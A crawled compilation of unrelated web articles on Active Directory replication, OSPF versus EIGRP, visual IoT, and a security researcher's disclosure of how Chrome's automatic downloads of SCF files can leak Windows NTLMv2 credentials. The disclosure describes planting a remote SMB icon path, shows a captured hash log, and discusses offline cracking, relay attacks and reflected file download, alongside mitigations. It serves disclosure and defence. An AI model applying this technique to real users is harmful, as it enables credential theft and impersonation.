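            peer.receive_replica(obj, attrs)

    def receive_replica(self, obj, attrs):
        # Only store and forward new information, to avoid endless loops.
        if self.database.get(obj) != attrs:
            self.database[obj] = attrs
            for peer in self.replicas:
                peer.receive_replica(obj, attrs)

# Three DCs in a full mesh: a change on any one reaches all of them.
dc1, dc2, dc3 = DomainController("DC1"), DomainController("DC2"), DomainController("DC3")
for dc in (dc1, dc2, dc3):
    dc.replicas = [d for d in (dc1, dc2, dc3) if d is not dc]

dc1.apply_change("user:alice", {"department": "IT"})
print(dc3.database["user:alice"])  # {'department': 'IT'}
```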
The Benefits of Active Directory Replication
Replicated domain controllers have many security benefits. Crucially, if one domain controller becomes damaged or goes down, the IT team can more easily replace all the original records it stored by copying its database to another site.
What’s more, if a threat actor steals valuable credentials from users on your organization’s network, they may try to change the permissions held in the local domain controller to escalate to higher privileges. If higher-privileged credentials are compromised, your network’s sensitive data is significantly more at risk, since these users tend to have access to the most sensitive resources. With replication, those changes can more easily be mitigated or dealt with once they’re spotted.
Additionally, having access to an ongoing comparison of an organization’s domain controller databases offers IT teams valuable security monitoring capabilities. Active Directory replication can also help your IT team eliminate a compromised account from your network altogether.
On the flipside, if you want to restore an original database and roll out updated records, it’s essential to run regularly scheduled system sweeps and integrity checks.
To get the most out of your replication, you need to implement good management policies for the network managers tasked with operating Active Directory. The increase in local domain controllers opens the door to security threats, creating more opportunities for bad actors to steal or alter data before being detected and locked out; security protocols should always be followed to avoid these risks.
Coordinating copies between domain controllers can quickly become complicated and time consuming, thus making it difficult to carry out Active Directory monitoring manually. It’s important to invest in automated tools to ensure your domain controllers and their replicas are all monitored.
Active Directory Replication Topologies
Replication traffic travels between domain controllers through a route known as the replication topology. There are four fundamental replication topologies. When deciding which to implement, you’ll want to consider the physical connectivity of your network.
- Ring Topology: In ring topologies, every domain controller has two outbound and two inbound replication partners. With this configuration, there are never more than three hops between domain controllers on a single site.
- Hub and Spoke Topology: The hub and spoke topology is defined by the existence of one or more hub sites using slow wide area network (WAN) connections to connect to spoke sites, while the hub sites connect to each other with fast WAN connections. This topology is most commonly implemented in enterprise environments where scalability is paramount and redundancy isn’t as highly valued.
- Full Mesh Topology: Full mesh topology is typically used in smaller organizations where redundancy is of the utmost importance and site availability is limited. However, this topology is costly and not easy to scale.
- Hybrid Topology: A hybrid topology can be a combination of any of the topologies outlined above.
Best Tools for Managing Active Directory
Managing your Active Directory authentication system can be an incredibly difficult process, especially when you’re dealing with large numbers of domains, trees, and forests. It’s easy to become overwhelmed if you attempt to do this manually, without the assistance of special, automated tools.
There are so many Active Directory tools on the market, it can be hard to choose the best one for your needs. I’ve tested many of the most popular solutions out there and assessed their strengths and weaknesses to narrow down the field. Below are my top picks for the best Active Directory management solutions.
The best Active Directory tool on the market is without a doubt SolarWinds Access Rights Manager. IT teams can install ARM on any version of Windows Server and immediately begin managing access rights across an IT infrastructure.
ARM has several automated tools to make access rights management easy. For one, it includes custom-delivered Active Directory reporting, enabling IT admins to generate ad hoc reports to see which users have access to what on their networks. The reports can go into detail to show when a user accessed a file or folder on the network.
In addition to helping IT teams analyze and monitor user access, the ARM Active Directory reporting tool can be leveraged to generate preconfigured compliance materials for a myriad of industry formats—including GDPR, PCI, and HIPAA. These reports can be automated and scheduled ahead of time.
Additionally, IT teams can use ARM to protect their organizations against data loss and potential security breaches with the help of automated monitoring. When ARM is installed in your infrastructure, it will get right to identifying user accounts with insecure configurations that might signal credential theft or authorization misuse. And with ARM’s ability to provide IT admins with a full audit trail of all permissions and access-level changes, cybersecurity investigations can be completed in a matter of minutes.
Finally, ARM enables IT teams to automate the entire Active Directory user provisioning process with the aid of role-specific templates. These templates ensure users conform to security policies by commissioning access privileges via the principle of least privilege.
Server & Application Monitor is another excellent tool from the team at SolarWinds. In addition to being a full-stack server monitoring software, SAM operates as a tool for Active Directory management. Users can easily monitor and troubleshoot any Active Directory performance issues with a myriad of automated features.
With SAM, users can leverage the Replication Summary view to make sure all replications between domain controllers are successful. This allows IT teams to quickly identify replication status and drill down into the domain controller replication process. With a full cart of metrics, IT teams can glean insights into the progress and success of different configurations, AD schemas, and more.
In addition, SAM includes a Domain Controller Details widget, so IT teams can review domain controller roles and make changes as needed. This tool provides a holistic view into the status and role of each domain controller on your network. IT admins can even view, search, and sort all five Flexible Single Master Operations (FSMO) roles, from the schema master and domain naming master to the PDC emulator and the infrastructure master.
Beyond these features, SAM offers a resource for IT teams to view all Active Directory site details in real time. The Site Details tool allows users to drill down into each site, which means IT admins can obtain and leverage helpful information—from site link name to subnets and IP ranges—to quickly identify and solve any remote location Active Directory issues.
PRTG Network Monitor by Paessler operates as a bundle of tools, which it refers to as sensors. Some of these are Active Directory sensors, which can be used to monitor your AD systems. If you activate no more than 100 sensors, you can use PRTG for free. Beyond 100 sensors, pricing depends on how big your network is and how many sensors you choose to activate.
The PRTG Active Directory sensors can be used by IT teams to monitor their AD replication system. When used properly, they ensure the database is copied to all domain controllers on the network. Additionally, the tool’s Active Directory Replication Errors Sensor is designed to monitor different parameters during a directory’s replication period, to help ensure your domain controllers are synchronized and in line with one another. In the case of an anomaly or an error, an alarm will be sent to an IT admin.
What’s more, this solution can log employees’ network activity, which can offer network admins insights into suspicious behavior or internal threats and is helpful in managing issues associated with logged-out or deactivated users.
ManageEngine has a wide variety of network monitoring solutions, one of the best of which is its full-service Active Directory management tool. IT teams can use AD Manager Plus to extend Active Directory into G Suite, Office 365, Microsoft Exchange, Skype, and their own internal network access rights.
The tool is neatly organized: it operates from a single dashboard, on which IT admins can easily view and monitor all Active Directory objects and groups, and provision users. In addition, I like AD Manager Plus for its robust reporting system. You can easily generate Active Directory reports on either a scheduled or ad hoc basis, and the tool comes with more than 150 preconfigured report templates, which goes a long way when you’re working to stay in compliance with industry regulators. ManageEngine can also generate specific reports for Active Directory users, logons, computers, passwords, and other objects.
AD Manager Plus comes with more of a learning curve than the other tools. Its user interface isn’t the most intuitive, especially when operating on mobile, and the lack of documentation makes it hard to deal with little bugs here and there. Users may also have a tough time tracking down a support team member to assist with more complicated inquiries. | <urn:uuid:eaad16fe-10ed-43b3-bf9d-f7ca7336ab48> | CC-MAIN-2022-40 | https://www.dnsstuff.com/active-directory-forest | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00762.warc.gz | en | 0.917547 | 3,830 | 2.5625 | 3 |
Open Shortest Path First (OSPF) and Enhanced Interior Gateway Protocol (EIGRP) are two of the most popular Internal Gateway Protocols (IGPs) employed in today’s modern IP networks.
Both are mature protocols, having been around for decades, and are extremely reliable, flexible, and highly configurable. And yet, they are surprisingly dissimilar in their architecture, implementation, and design.
In this article we’ll discuss and compare OSPF vs EIGRP routing protocols, but first let’s see a quick comparison table of the two:
Comparison Table of OSPF vs EIGRP
The following table compares some of the most important characteristics of these two protocols:
| # | Characteristic | OSPF | EIGRP |
|---|----------------|------|-------|
| 1 | Type | Link state | Advanced distance vector |
| 2 | Open standard? | Yes, since inception | Began as proprietary but has been an open standard since 2013 |
| 3 | Routing algorithm | Dijkstra's Algorithm | Diffusing Update Algorithm (DUAL) |
| 4 | Topology | Each router maintains a network topology within the OSPF database of the area in which it resides | Each router maintains a topology table that contains the routes it has learned about via EIGRP |
| 5 | Areas | Uses areas to break down larger topologies into manageable segments | Does not use areas |
| 6 | Scalability | Extremely scalable due to area architecture and multiple LSA types | Extremely scalable due to incremental updates and storing of partial topologies |
| 7 | Resource usage (CPU, memory, and network throughput) | Low usage due to multiple LSA types and area architecture | Low usage due to incremental updates and the feasible successor mechanism |
| 8 | Support for IPv4 and IPv6 | Yes, in OSPFv3 | Yes |
| 9 | Convergence speed | Fast | Extremely fast |
| 10 | Default administrative distance (AD) | 110 | 90 |
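The default administrative distance in the last row is worth a concrete illustration: when two protocols both supply a route to the same prefix, the router installs the candidate with the lowest AD. A minimal sketch (the next-hop addresses are made-up documentation values):

```python
# Default administrative distances on Cisco IOS (lower is preferred).
ADMIN_DISTANCE = {"connected": 0, "static": 1, "eigrp": 90, "ospf": 110, "rip": 120}

def preferred_route(candidates):
    """Pick the (protocol, next_hop) candidate with the lowest AD."""
    return min(candidates, key=lambda c: ADMIN_DISTANCE[c[0]])

# Both protocols have learned 10.0.0.0/24; EIGRP (AD 90) beats OSPF (AD 110).
routes = [("ospf", "192.0.2.1"), ("eigrp", "192.0.2.2")]
print(preferred_route(routes))  # ('eigrp', '192.0.2.2')
```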
Now let’s take a closer look at each one.
OSPF was first conceived in the 1980s and was officially released in 1989 in RFC 1131. It is a non-proprietary protocol, meaning it can be freely implemented by the equipment of any vendor, and it is what is known as a link-state routing protocol.
An OSPF router will gather link state information from neighboring OSPF routers and will create and maintain a topology of the whole network within its memory.
This is maintained within a data structure known as the OSPF database. In a converged network, all OSPF routers will have constructed an identical copy of the network topology in their memories. This is the main construct via which OSPF operates.
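Because every router holds an identical copy of the area topology, each one can independently run Dijkstra's algorithm over that database to compute its own shortest paths. The sketch below illustrates the idea on a hypothetical four-router topology (router names and link costs are invented for the example):

```python
import heapq

def dijkstra(lsdb, source):
    """Compute the lowest-cost distance from source to every router.

    lsdb maps each router to its links: {neighbor: cost}. Every OSPF
    router runs this same computation over its identical copy of the
    area's link-state database.
    """
    dist = {source: 0}
    queue = [(0, source)]
    while queue:
        cost, node = heapq.heappop(queue)
        if cost > dist.get(node, float("inf")):
            continue  # stale queue entry
        for neighbor, link_cost in lsdb.get(node, {}).items():
            new_cost = cost + link_cost
            if new_cost < dist.get(neighbor, float("inf")):
                dist[neighbor] = new_cost
                heapq.heappush(queue, (new_cost, neighbor))
    return dist

# Hypothetical four-router area with OSPF-style interface costs.
lsdb = {
    "R1": {"R2": 10, "R3": 1},
    "R2": {"R1": 10, "R4": 1},
    "R3": {"R1": 1, "R4": 5},
    "R4": {"R2": 1, "R3": 5},
}
# R2 is reached at cost 7 via R3 and R4, not 10 via the direct link.
print(dijkstra(lsdb, "R1"))
```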
One of the major differences between OSPF and EIGRP is the fact that OSPF uses a concept of areas. An area in OSPF is simply a logical grouping of routers.
Each OSPF area maintains a separate OSPF database. OSPF routers can either exist wholly within an area, or they can have interfaces within two or more areas, making them border routers. Take a look at the following diagram which illustrates this:
In this case, R1 has one interface in Area 0 and one in Area 1. R1 is thus considered an Area Border Router or ABR. ABRs maintain a separate OSPF database for every area that they are connected to.
There are some restrictions as to how areas can be created, and these include:
- An OSPF topology must always have an Area 0. This is also called the backbone area.
- All non-backbone areas must be directly connected to Area 0. In other words, any ABR within a non-backbone area must also have a connection to Area 0.
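These two restrictions are mechanical enough to check programmatically. The sketch below validates a design described as a map of routers to the set of areas they have interfaces in (the topology itself is invented for illustration):

```python
def validate_areas(routers):
    """Check the two OSPF area rules on a {router: set_of_areas} map.

    Returns a list of problems; an empty list means the design is valid.
    """
    problems = []
    all_areas = set().union(*routers.values())
    if 0 not in all_areas:
        problems.append("no backbone (Area 0) exists")
    for area in all_areas - {0}:
        # An ABR for this area must also have an interface in Area 0.
        has_abr_to_backbone = any(
            area in areas and 0 in areas for areas in routers.values()
        )
        if not has_abr_to_backbone:
            problems.append(f"Area {area} has no ABR connected to Area 0")
    return problems

# R1 is an ABR between Area 0 and Area 1; Area 2 is illegally isolated.
topology = {"R1": {0, 1}, "R2": {1}, "R3": {2}}
print(validate_areas(topology))  # ['Area 2 has no ABR connected to Area 0']
```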
With the introduction of areas, OSPF database contents are limited to the routes found within each area. A router in Area 0 doesn’t need to have information about the network topology in Area 1, for example.
It is this very characteristic, that of segmenting an OSPF topology into smaller more manageable areas, that makes OSPF extremely scalable.
Link State Advertisements
OSPF’s routing updates are called Link State Advertisements (LSAs). These are messages exchanged between OSPF routers to share information about their local routing topologies.
Because of the scalability introduced with the use of OSPF areas, not all LSAs are flooded out of all interfaces of an OSPF router.
There are various types of LSAs, each one limited to being shared with specific OSPF neighbors. In this way, detailed OSPF information is kept localized, ensuring that any routing information not useful for particular routers is not shared, while summary information about routes is flooded to the whole topology. This ensures the minimization of the use of system resources on OSPF routers.
Unlike OSPF, EIGRP began as a proprietary routing protocol developed by Cisco. It is the enhanced version of its original IGRP protocol and was introduced in 1993.
It is known as an advanced distance-vector routing protocol. EIGRP does not maintain a database containing the full network topology, but only shares information about the routes in its routing table.
When sending updates to its neighbors, an EIGRP router doesn’t share the entirety of its routing information, but sends incremental updates, vastly reducing network bandwidth usage as well as processing and memory resources on each router.
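The idea behind incremental updates can be sketched as a simple diff between the previously advertised routes and the current ones, so that only changes and withdrawals cross the wire (the prefixes and metrics below are illustrative):

```python
def incremental_update(previous, current):
    """Compute what to advertise since the last update.

    Instead of resending the full table, only changed or new entries
    (plus withdrawals of vanished prefixes) are sent to neighbors.
    """
    changed = {
        prefix: metric
        for prefix, metric in current.items()
        if previous.get(prefix) != metric
    }
    withdrawn = [prefix for prefix in previous if prefix not in current]
    return changed, withdrawn

old = {"10.0.0.0/24": 100, "10.0.1.0/24": 200}
new = {"10.0.0.0/24": 100, "10.0.1.0/24": 150, "10.0.2.0/24": 300}
print(incremental_update(old, new))
# ({'10.0.1.0/24': 150, '10.0.2.0/24': 300}, [])
```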
EIGRP uses the following data constructs in addition to the routing table, to achieve its operation:
Neighbor table – This is a record of the IP addresses of neighboring routers, those that have a direct physical connection to the local router. Only routers with IP addresses in the same subnet as an interface of the local router are considered neighbors.
Topology table – This construct stores routes that the router has learned from its neighbors. It only stores EIGRP-learned routes but makes a record of all possible routes to a particular destination. It is only the best route in the topology table that makes it into the routing table.
Successors and Feasible Successors
As mentioned before, within the topology table, all of the possible routes to a particular destination are recorded.
This means that there may be two, three, four, or more paths that can be taken to reach a particular destination, and all of them are maintained there. The best route, which is placed in the routing table is called the successor. The second-best route is called the feasible successor.
This is an important concept because EIGRP has a trick up its sleeve. It is always ready to immediately (within several milliseconds) replace the successor with the feasible successor in the event of a failure without the need to rerun the EIGRP routing algorithm, which may take substantially longer depending upon the size of the topology. This makes EIGRP lightning fast in the event of a failure of a route.
In order to become a feasible successor, this second-best route must fulfill what is known as the feasibility condition, but that’s a topic for another article.
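Without going into the full details, the selection logic can be sketched like this: the successor is the entry with the lowest feasible distance, and a feasible successor is the best remaining entry whose reported distance is strictly less than the successor's feasible distance, which is what guarantees the backup path is loop-free (all metrics below are made up for illustration):

```python
def select_paths(topology_entries):
    """Pick the successor and feasible successor for one destination.

    Each entry is (next_hop, feasible_distance, reported_distance).
    Feasibility condition: an alternative qualifies as a feasible
    successor only if its reported distance is strictly less than
    the successor's feasible distance.
    """
    by_fd = sorted(topology_entries, key=lambda e: e[1])
    successor = by_fd[0]
    feasible = [e for e in by_fd[1:] if e[2] < successor[1]]  # RD < successor FD
    return successor, (feasible[0] if feasible else None)

# Three candidate paths to the same prefix (invented metrics).
entries = [
    ("via-R2", 3072, 2816),   # best path: becomes the successor
    ("via-R3", 4096, 2560),   # RD 2560 < 3072: feasible successor
    ("via-R4", 5120, 4096),   # RD 4096 >= 3072: fails the condition
]
successor, backup = select_paths(entries)
print(successor[0], backup[0])  # via-R2 via-R3
```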
We can come to some conclusions about these protocols based on the above information:
- OSPF is generally preferred due to its open architecture
- EIGRP is generally preferred due to its slightly better handling of resources, especially for large networks. This is reflected in its slightly lower AD
- There is no solid evidence for which protocol is more scalable (i.e. which can support a larger network size) as both, under varying circumstances, perform similarly. However:
- EIGRP is better in environments where there are more routes to share among fewer routers
- OSPF is better in environments where there are fewer routes to share among more routers
Links to relevant standards:
- OSPFv2 RFC2328
- OSPFv3 RFC5340 (includes support for IPv6)
- EIGRP RFC7868 (published when it became an open standard) | <urn:uuid:c2868e3c-3b70-48a0-8a2a-ea5063fcfd15> | CC-MAIN-2022-40 | https://www.networkstraining.com/ospf-vs-eigrp-routing-protocols/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00762.warc.gz | en | 0.938597 | 1,717 | 3.03125 | 3 |
Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the Internet was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference in 2015.
However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This article describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it.
With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one. From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that?
Windows Explorer Shell Command File, or SCF (.scf), is a lesser-known file type dating back as far as Windows 98. Most Windows users encountered it on Windows 98/ME/NT/2000/XP, where it was primarily used as the Show Desktop shortcut. It is essentially a text file with sections that determine a command to be run (limited to launching Explorer and toggling the desktop) and an icon file location. As an example, this is what the Show Desktop SCF file contents looked like:
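For reference, the classic Show Desktop shortcut was a plain-text file along these lines (reconstructed from the well-known Windows-era file; the exact icon index may differ between versions):

```ini
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
```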
As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet but does not give the same treatment to SCF files.
An SCF file that can be used to trick Windows into an authentication attempt against a remote SMB server contains only two lines, as shown in the following example:
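For illustration, such a file could look like the following (the SMB server address is a hypothetical placeholder, not an address from the original research):

```ini
[Shell]
IconFile=\\203.0.113.5\share\test.ico
```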
Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it, or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the "icon".
The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following:
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 22.214.171.124:62521 - 126.96.36.199
USER:Bosko DOMAIN:Master OS: LM:
NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e0000000002000000000000 0000000000
The above example shows the disclosure of the victim's username, domain, and NTLMv2 password hash.
It is worth mentioning that SCF files appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, a file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to the inconspicuous nature of attacks using SCF files.
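The masquerading effect can be illustrated with a quick sketch (Python; this obviously does not reproduce Explorer's behavior, it only shows what stripping the .scf extension leaves behind):

```python
import os

full_name = "picture.jpg.scf"
displayed, hidden_ext = os.path.splitext(full_name)
print(displayed)    # picture.jpg -- what Windows Explorer shows the user
print(hidden_ext)   # .scf        -- the extension Explorer hides
```

Because the visible part still ends in a familiar .jpg, a user has no visual cue that the file is anything other than an image.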
For users in Active Directory domains (corporate, government and other networks), password disclosure can have various impacts ranging from escalating internal network breaches to accessing externally available NTLM-enabled services and breaches based on password reuse.
For Windows 8/10 users who use a Microsoft Account (MSA) instead of a local account, the password disclosure affects all Microsoft services integrated with MSA single sign-on, such as OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and others. The common problem of password reuse can lead to further account breaches unrelated to the MSA.
Password cracking feasibility has improved greatly in the past few years with GPU-based cracking. The NetNTLMv2 hashcat benchmark for a single Nvidia GTX 1080 card is around 1600 MH/s; that's 1.6 billion hashes per second. For an 8-character password, a GPU rig of four such cards can go through the entire keyspace of upper/lowercase alphanumeric characters plus the most commonly used special characters (!@#$%&) in less than a day. With hundreds of millions of passwords leaked in breaches over the past years (LinkedIn, Myspace), wordlist rule-based cracking can produce surprising results even against complex passwords with more entropy.
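A quick back-of-the-envelope check of the keyspace claim (Python; the 1.6 GH/s per-card figure and the four-card rig are taken from the text above):

```python
# 8-character passwords over upper/lowercase letters, digits,
# and the six special characters !@#$%&.
charset = 26 + 26 + 10 + 6          # 68 symbols
keyspace = charset ** 8             # total candidate passwords

rate = 4 * 1_600_000_000            # 4 x GTX 1080 at ~1.6 GH/s (NetNTLMv2)
seconds = keyspace / rate
print(f"{keyspace:.3e} candidates, ~{seconds / 3600:.1f} hours to exhaust")
# prints: 4.572e+14 candidates, ~19.8 hours to exhaust
```

So a full exhaustive search does indeed fit comfortably inside a single day, consistent with the article's claim.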
The situation is even worse on Windows XP systems and on networks where backwards compatibility with NTLMv1 has been explicitly enabled. In those cases, a downgrade attack can be performed, forcing the client to authenticate with a weaker hash/protocol (such as NTLMv1 or even LM) instead of NTLMv2. This lets the attacker capture a hash that can be cracked many times faster than NTLMv2; in the case of LM, often within seconds using precomputed tables for reversing cryptographic hash functions ("rainbow tables").
SMB relay attacks
Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as an authentication method may be vulnerable to SMB relay attacks, which allow the attacker to impersonate the victim and access data and systems without having to crack the password. This was successfully demonstrated by Jonathan Brossard at the Black Hat security conference.
Under certain conditions (external exposure), an attacker may even be able to relay credentials to a domain controller on the victim's network and essentially gain internal access to the network.
Antivirus Handling of SCF
Naturally, when a browser fails to warn about or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions from different vendors to determine whether any of them would flag the downloaded file as dangerous.
All of the tested solutions failed to flag the file as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement, as it only requires inspecting the IconFile parameter, given that there are no legitimate uses of SCF files with remote icon locations.
Introducing new attack vectors
Social engineering that entices the victim to visit the attacker's website, along with open-redirection and cross-site scripting vulnerabilities on trusted websites, are the most common attack vectors for delivering malicious files. For this attack, however, I would like to add an often disregarded and lesser-known vulnerability that could serve the same purpose, in the hope of drawing attention to its impact.
Reflected file download
First described by Oren Hafif, the Reflected File Download vulnerability occurs when specially crafted user input is reflected in the website's response and downloaded by the user's browser when certain conditions are met. It was initially used as an attack vector to trick the user into running malicious code (usually from a Windows batch file), based on the user's trust in the vulnerable domain.
Since the SCF format is rather simple and our attack requires only two lines that can be preceded and followed by (almost) anything, it creates perfect conditions for use with RFD.
RFD is usually aimed at RESTful API endpoints, as they often use permissive URL mapping, which allows the extension of the file to be set in the URL path. Chrome will not directly download most typical API response content types, so these would have to be forced through a download attribute in <a href=…> link tags. However, there are exceptions. Chrome uses MIME sniffing with the text/plain content type: if the response contains a non-printable character, it will be downloaded as a file directly and automatically, unless the "nosniff" directive is set.
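As a sketch of why the non-printable character matters, the following shows how a reflected payload carrying the two SCF lines plus a vertical-tab character (%0B when URL-encoded) might be assembled. This is a conceptual illustration only; the payload shape and the attacker.example.com host are assumptions, not the actual vulnerable endpoint:

```python
from urllib.parse import quote

# Two SCF lines followed by a vertical tab (\x0b); the non-printable byte is
# what makes Chrome download a sniffed text/plain response instead of
# rendering it inline.
payload = "[Shell]\nIconFile=\\\\attacker.example.com\\share\x0b"
encoded = quote(payload)
print(encoded)                  # the URL-encoded form ends with %0B
print(encoded.endswith("%0B"))  # True
```

When a vulnerable endpoint reflects this parameter back in its response, the browser sees plain text containing a non-printable character and saves it to disk under the attacker-chosen .scf filename.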
This can be demonstrated on the World Bank API, using the following URL:
Due to the non-printable character %0B, Chrome will download the response as a file named iwantyourhash.scf. The moment the download directory containing the file is opened, Windows will try to authenticate to the remote SMB server, disclosing the victim's authentication hashes.
To disable automatic downloads in Google Chrome, make the following change: Settings -> Show advanced settings -> check the "Ask where to save each file before downloading" option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files.
As SCF files still pose a threat, the measures to take depend on the affected users' network environment, and range from simple host-level hardening and perimeter firewall rules to additional security measures such as SMB packet signing and Extended Protection. With the first two, the goal is to prevent SMB traffic from leaving the corporate environment by blocking the ports that can be used to initiate a connection to a potentially malicious Internet-based SMB server. Wherever possible, SMB traffic should be restricted to private networks.
Currently, the attacker just needs to entice the victim (running fully updated Google Chrome and Windows) to visit his website in order to reuse the victim's authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such a vulnerability could pose a significant threat to large organisations, as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse the gained privileges to further escalate access, perform attacks on other users, or gain access to and control of IT resources.
We hope that the Google Chrome browser will be updated to address this flaw in the near future.
Bosko Stankovic is a Senior Security Engineer at DefenseCode, a provider of static and dynamic application security testing.
In February 2022, WhiteSource acquired DefenseCode. | <urn:uuid:00e09d53-6143-44d3-843f-6f505f2e29c1> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2017/05/15/stealing-windows-credentials-using-google-chrome/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00762.warc.gz | en | 0.903062 | 2,361 | 2.515625 | 3 |
The Internet of Things (IoT) allows devices to send data to cloud storage, where it can be combined with other data, analysed and interpreted using techniques such as predictive analytics, artificial intelligence and deep learning. The resulting knowledge, including identification of patterns and trends, reveals new insights that have the potential to touch every aspect of our lives. Many of us are already using IoT devices in our homes, from smart sensors to voice activated virtual assistants.
However, I believe that to achieve the IoT’s full potential we must add visual data to create the Visual IoT (VIoT). Sight is the most important of our senses, so integrating visual information with other IoT data streams is immensely powerful. It helps a system or device better understand and interpret objects and movement as well as its surroundings based on the visual data it can ‘see’.
We now have the processing power, bandwidth, data storage capacity and computing ability to enable fast, reliable analysis of visual data to a standard that makes it commercially viable. The result, according to McKinsey, is that video analytics will see a compound annual growth rate of more than 50 percent over the next five years, contributing to a potential economic impact for the IoT of $3.9 trillion to $11.1 trillion a year by 2025.
Doing this does not require hundreds of new cameras. Huge volumes of visual data already exist, collected by the analogue and digital cameras that surround us, from traffic and numberplate recognition cameras to CCTV systems. Most of this visual data, however, is currently collected for a single purpose, and only a tiny percentage is ever viewed. Combining it with other IoT data streams and adding analytics would make it immensely valuable.
Our research suggests there are currently some 8.2 million surveillance cameras in the UK, producing 10.3 petabytes of visual data every hour. Consolidating this in a cloud infrastructure and combining it with other data sets, from static data such as grid references to dynamic ones such as weather data, could provide clear visual insight into what is happening, why, and what might happen next. Applications could range from speeding up the response to motorway accidents and managing city centre parking to working with people flows in transport hubs and caring for vulnerable people.
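As a rough sanity check, those two figures imply a sustained per-camera data rate that can be computed directly (the per-camera rate below is derived here, not quoted from the research, and decimal petabytes are assumed):

```python
cameras = 8_200_000
petabytes_per_hour = 10.3
bytes_per_hour = petabytes_per_hour * 1e15       # decimal petabytes

# Convert to an average sustained bitrate per camera.
per_camera_bps = bytes_per_hour * 8 / cameras / 3600
print(f"~{per_camera_bps / 1e6:.1f} Mbit/s per camera")   # ~2.8 Mbit/s per camera
```

A sustained rate of a few megabits per second per camera is in the plausible range for compressed surveillance video, so the headline figures hang together.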
We are already seeing companies such as Vodafone integrating cloud-based CCTV with building security systems, adding visual verification to intruder alarms. Such systems can enable home security companies and the police to check properties visually when an alarm goes off and quickly ascertain whether a break-in has occurred. This can provide significant time and cost savings while enabling immediate action to be taken if appropriate.
Cameras combined with analytics can be configured to map patterns of movement in real time, helping to understand the number and flow of people in public spaces such as stations, airport terminals, tourist attractions and shopping malls. This could be used to automate the management of people-flow systems, for example changing the direction of escalators and lifts as customer behaviour patterns change during the day. In many cases a camera can be used simply as a sensor, with analytics to verify something (for example, that the object at the barrier is a red van with a particular numberplate) and take action, such as lifting the barrier, without necessarily recording the image.
Another application is city centre parking. According to the British Parking Association, 30 percent of city centre drivers are simply looking for a parking space. Cameras could monitor roadside parking spots, letting a central system know which are unoccupied. Location data could be shared with a driver’s routing app, with visual data made accessible so they know what they are looking for. It should even be possible for the driver to book a space and authorise payment to be made automatically, with length of stay calculated and payment taken when they leave.
Another exciting possibility is to speed up the response to road traffic accidents. The VIoT offers the possibility of combining data from motorway cameras to help pinpoint the precise location of accidents and to tell first responders in real time about any hold-ups when they are en route. This information could be combined with in-vehicle routing systems to ensure their swift arrival.
Applying analytics to visual data will lead to further applications by revealing patterns and predicting future behaviours. This intelligence will help organisations optimise systems, improve safety and make better, faster, more appropriate decisions. The good news is that machines are doing the ‘watching’ – not people.
Analytics combined with AI and IoT can also play a key role in helping protect more vulnerable members of society. We are already seeing cameras used in care situations to detect pre self-harming or suicidal behaviours, and to monitor individuals to ensure they are being well treated (with appropriate permissions). In the future older people living in their own homes could benefit from cameras which record where and when they are active. Periods of inactivity might indicate a problem and could trigger alerts to family or carers. Cameras at stations could be trained using AI to spot behaviours indicative of potential suicides and issue appropriate alerts to staff.
The big issue is of course privacy, but the right analytical software enables automatic decisions to be made without human involvement, while the General Data Protection Regulation (GDPR) provides additional data protection. There are also many applications in sectors such as the environment that will not involve individuals at all.
James Wickes is cofounder and chief executive at Cloudview
Further information is available in the White Paper VISUAL IoT: WHERE THE IoT, CLOUD AND BIG DATA COME TOGETHER. | <urn:uuid:9eacbaac-6a87-45b4-b4fd-a28705dbd725> | CC-MAIN-2022-40 | https://www.b2e-media.com/creating-the-visual-iot | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00762.warc.gz | en | 0.94107 | 1,128 | 2.625 | 3 |
The internet of things (IoT) has been constantly expanding to encompass an increasing number of connected objects such as smart refrigerators, virtual assistants built into speakers, and driverless cars. IoT has been impacting businesses in unprecedented ways by increasing the productivity of operations. According to Gartner, the number of connected things will reach 20.4 billion by 2020.
Vulnerabilities in IoT
